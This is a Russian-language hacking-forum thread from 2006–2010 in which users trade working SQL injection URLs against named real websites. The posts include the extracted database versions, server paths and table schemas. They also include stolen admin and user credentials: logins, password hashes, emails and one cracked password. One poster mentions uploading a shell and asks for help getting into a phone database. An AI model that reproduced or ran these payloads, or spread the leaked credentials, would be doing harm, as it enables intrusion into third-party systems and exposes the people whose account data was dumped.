ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.08.2006, 21:30
|
|
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018
Репутация:
117
|
|
la2info.ru
Код:
_http://la2info.ru/db.php?action=npcs(АМПЕРСАНД)npcid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
P.S. с амперсандом фигня какая-то, не отображается.
|
|
|
30.10.2006, 22:34
|
|
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695
Репутация:
17
|
|
Скуль
http://abris.info/price/mark1.asp?id=-1
|
|
|
|
31.10.2006, 15:06
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Сообщение от corsp_puttrider
http://abris.info/price/mark1.asp?id=-1
http://abris.info/price/mark1.asp?id=1 or 1=@@version--
http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--
табличка login там 
|
|
|
|
10.12.2006, 01:07
|
|
Участник форума
Регистрация: 06.12.2006
Сообщений: 174
Провел на форуме:
1700952
Репутация:
199
|
|
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,4,5,6,7,8
Version: 4.0.21-standard
Database: eko
User: eko@localhost
OS: Unix
/www/host/eko/htdocs/
|
|
|
|
06.11.2007, 01:21
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
Код:
http://www.rotary.or.id/v20/news/detail.php?all=1&id=-1+union+select+1,2,version(),user(),5,database(),7,8,9
Округ 3400 Индонезии
Version: 4.1.20-log
User: tsantoso_3@209.68.1.63
Database: tsantoso_project
Бла, как ни старался подобрать таблицы - никак... |
|
|
|
22.11.2007, 22:56
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме:
65178
Репутация:
21
|
|
пиво..течет рекой..
вот сайтец..нормально его тоже можно ковырнуть.. вообще есть контора одна на украине..издательство..так у них там много подвязано сайтов в сети.. журнал какой-то выпускают..домашникй кампутер..если кому интересно, стучите в асю..там есть лазейка..и шел залить можна...
http://www.hotline.ua/pr/193-11-248/?v=438%20AND%201=3%20union%20select%201,2,3,host,5 ,6,7,8,9,10,11,12,13,12,15,16,17,LOAD_FILE('/server/htdocs/'),19,20,21,22,23,24,25,26,27,28,29,30,31%20from%2 0mysql.user/*&t=0&o=0&d=0&p=0
Снова UA
Сайт какой-то турфирмы..НО! хостится он на серваке каким-то образом связанным с правительством.. (по словам одного из админов одного сайта, точно также хостящегося на етом серваке..может и песдит..мне пох)
http://turi100.net/reviews/?review_id=225%20and%201=3)%20union%20select%201,2 ,3,version(),5,6/*версия мускула позволяет мне опустить рассказы о существующих таблицах..читаем отзывы туристов..в каментах..
Вот это сайт..у меня вообще слабость к базам данных..особенно телефонным..но тут, к сожелению, ничего не срослось, народ, прошу помощи у тебя, будет доступ к базе - отпишитесь
http://www.btk-online.ru/rest/?&r=2749%20union%20select%20concat(user,char(124), password,char(124),host)%20from%20mysql.user%20/*
Ждите продолжения  |
|
|
|
03.08.2008, 00:01
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://popsdb.twystneko.com
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))+limit+1,1--
version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /home/virtual/site198/fst/var/www/popsdb/list.php
Админка - http://popsdb.twystneko.com/admin
Далее, база с админом:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+nc_users+limit+1,1--
admin:2dfc97e5e093b4b339ad510433d2e9ff:cafe@nakedc ybercafe.com - расшифрованный пасс: naked
Ещё одна база всего с 1 человеком:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+bg_users+limit+2,1--
stephen:3e5a1b3b990187c9fb8e8156ce25c243:stephen@i crossroads.com
++++++++++++ Пойдём дальше.
http://dennis-oppenheim.com
Код:
http://www.dennis-oppenheim.com/list.php?id=-1+union+select+concat(0x3a,version(),0x3a,user(),0x3a,database()),1,1/*
version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /hsphere/local/home/rhjo2/dennis-oppenheim.com/list.php
++++++++++++ Пойдём дальше.
http://hivolume.com
Код:
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(version(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(user(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(database(),1),1),555/*
version() - 4.1.11-Max
user() - yads@localhost
database() - hivolume
Раскрытие пути - /home/sites/site4/web/en/list.php
++++++++++++
Так-же отдельное спасибо пользователям "sabe" и "Basurman", за помощь в вопросах по SQL.
Последний раз редактировалось Nightmarе; 03.08.2008 в 01:00..
|
|
|
|
09.12.2009, 05:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.med-tech.com.ua/index.php?mod=mobfirms&id=9999+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version( ),database(),user()),16,17,18,19,20--+
версия БД:4.0.13:
БД:user_medtech2:
пользователь:medtech2@localhost
http://www.pilot-film.com/index.php?p=show_person&pid=8831+union+select+1,2, concat_ws(0x3a,convert(version()+using+cp1251),con vert(user()+using+cp1251),convert(database()+using +cp1251),convert(@@version_compile_os+using+cp1251 )),4,5,6,7,8,9,10--+
версия:4.1.18-log
пользовательilot@localhost
БДilot
ОСortbld-freebsd6.1
http://slideshow.com.ua/ru/view.php?id=-000963+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a ,version(),database(),user(),@@version_compile_os)--+
версия:5.0.87-community-log
БД:slidesho_slideshow
пользователь:slidesho@localhost
ОС:unknown-linux-gnu
http://slideshow.com.ua/ru/view.php?id=-000963+union+select+1,2,3,4,5,6,7,8,group_concat(u nhex(hex(TABLE_NAME))%20separator%200x40)FROM%20in formation_schema.TABLES+WHERE%20TABLE_SCHEMA=0x736 c69646573686f5f736c69646573686f77--+
gallery@slideshow
------------------------------>
http://www.steelprom.com/articleview.php?id=-62+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),8,9,10--+
версия:5.0.22
БД:urka200022_steel
пользователь:son3@localhost
ОС:redhat-linux-gnu
DB:
Код:
information_schema@test_del@urka200022_stee
tables:
Код:
aallcontr@aallservices@aanekdots@aboard@acontract@adish@adistr@aevents@afiles@ajob@akitchen@amenukindname@anews@article@aservices@astatistuser@atypuser@auserdishtype@ausers@avisitors@avoting@board@board2@category@communication@du_client@du_filedl@du_forumb@du_forumt@du_news@du_passw@du_sendpost@du_usprog@favcatnews@favcatprod@favprod@files@login@news@newsgroup@product@searchplacelist@searchword@searchwplace@stoplist@tablelist@testtable@topic@users@webclient
атрибуты webclient:
Код:
id@user_id@dt_zakaz@diam@sten@mar_st@zakazano@srok_post@otgruzh@vagon@dt_vagon@sklad_nik@sklad_st@dt_prokat@typ@is_close@dt_close
атрибуты users:
Код:
d@login@passwd@name@first_name@typ@is_locked@e_mail@phone@fax@dt_created@dt_locked@sms@txt@handy@communication_id@country
атрибуты ausers:
Код:
id@login@passwd@name@name_boss@name_man@typ_id@kitchen_id@timework@logo_id@adress@extadress@phone@e_mail@http@distr_id@map_id@descr@viewfoto@namefoto@sizefoto@foto_size_y@discount@is_locked
атрибуты login:
Код:
d_login@login@password@status
атрибуты du_passw:
Код:
id@iduser@identkod@sdate
атрибуты du_client:
Код:
id@login@passw@email@lico@firma@licenz@prg_c@prg_v@prg_z
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,GROUP_CONCAT(concat_ ws(0x3a,login,password,status)%20separator%200x32) %20,8,9,10+FROM+login--+
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,group_concat(unhex(h ex(login))%20separator%200x40),8,9,10+FROM+ausers--+
http://www.steelprom.com/articleview.php?id=-62+union+select+1,'2',3,4,5,6,group_concat(concat_ ws(0x3a,unhex(hex(login)),unhex(hex(passwd)),unhex (hex(phone)),unhex(hex(e_mail)))%20separator%200x4 0),8,9,10+FROM+users--+
PostgreSQL
http://odessa-vecher.com/restaurantse.php?id=-19+union+select+null,null,null,version(),current_u ser(),null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null--+&action=view
version:5.0.81-community-log
user dessave_boltik@localhost
http://www.arsenal.com.ua/news.php?id=138+union+select+concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),2,3,4, 5,6,7--+
версия:4.1.22-log
БД:arsenalu
пользователь:u_arsenalu@localhost
ОСc-linux-gnu
http://www.lcci.com.ua/opennews.php?id=-339+union%20+select+1,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),3/*
версия:4.1.22-log
БД:lcci
пользователь:lcci@localhost
ОС:unknown-freebsd6.2
Последний раз редактировалось Strilo4ka; 10.12.2009 в 15:50..
|
|
|
|
31.12.2009, 01:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.zverevcenter.ru/inc.php?inc=-96+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10--+
5.0.87-log:zverevcenter@localhost:zverevcenter
|
|
|
|
01.01.2010, 07:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
новогодний подарочек
кавычки не екранируються!!!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database(),@@version_compile_os) ,11,12--+
mma@localhost:5.0.27:kcbs_mma:redhat-linux-gnu
DB:
Код:
information_schema:kcbs_db:kcbs_mma
kcbs_db:
Код:
AreaOfInterest:Calendar:ClassInstructor:CompetitionTeam:ContestEvent:ContestRep:Event:EventContact:EventTypes:FamilyMember:Location:MemberInterest:Membership:Organization:Person:Unit
kcbs_mma:
Код:
AreaOfInterest:Calendar:ClassInstructor:CompetitionTeam:ContestEvent:ContestRep:Event:EventContact:EventTypes:FamilyMember:Location:MemberInterest:MemberSignups:Membership:Organization:Person:Unit:admins:categories:cbj:classes:eventDirectors:eventResults:greatamerican:linkcats:links:market_backyard:market_bbq:market_category:market_rate:market_verify:member_survey:news:photos:recipes:reps:rssNews:signups:states:teamoftheyear:teams:topten:totyteams:tourEvents:toy_dev:toyteams_dev:users:webmembers
admins:
Код:
id:nameuser:wordpass
users:
Код:
userId:email:password
webmembers:
Код:
id:memberId:personId:nameuser:wordpass:lastLogin:email:firstname:lastname:city:state:country
person:
Код:
Name:PersonId:Phone:AltPhone:Fax:Email:Address:City:State:Zip:Birthdate:Address2:FirstName:LastName
organization:
Код:
OrganizationID:OrganizationName:OrgAbbreviation:City:Address:State:Zip:Phone:Fax:InvoiceNumber:MembershipFee:FamilyMembershipFee:ForeignMembershipFee:ForeignFamilyMembershipFee:RunningMemNumber:OrganizationID:OrganizationName:OrgAbbreviation:City:Address:State:Zip:Phone:Fax:InvoiceNumber:MembershipFee:FamilyMembershipFee:ForeignMembershipFee
3360 пользователей!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,nameuser,wordpass,email,lastLogin),11,12+from+web members+limit+3360,10000--+
1690 пользователей!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,email,password),11,12+from+users+limit+1690,10000--+
админ
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,nameuser,wordpass),11,12+from+admins--+
#2
http://www.urbanstrategies.us/events/event.php?id=-6+UNION+select+1,2,concat_ws(0x3a,user(),version() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19--+
usdbadmin@localhost:4.0.27-log:us_webdata c-linux-gnu
#3
http://www.campisis.us/locdetail.php?id=-2+union+select+1,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12--+
campisis@72.167.131.114:4.1.22-max-log:campisis:unknown-linux-gnu
#4
http://www.megger.com/us/products/ProductDetails.php?ID=-643+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,user(),version(),database(),@@version_compile_o s),12,13,14,15,16,17--+
jbiddle@localhost:5.1.30-community roducts:Win64
#5
http://www.globalwaterchallenge.org/about-us/board.php?id=-18+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database(),@@version_compile_os)%20%20,7,8 ,9,10,11,12--+
globalwater@localhost:5.0.58:globalwater_site:redh at-linux-gnu
Последний раз редактировалось Strilo4ka; 01.01.2010 в 09:02..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Комбинированный вид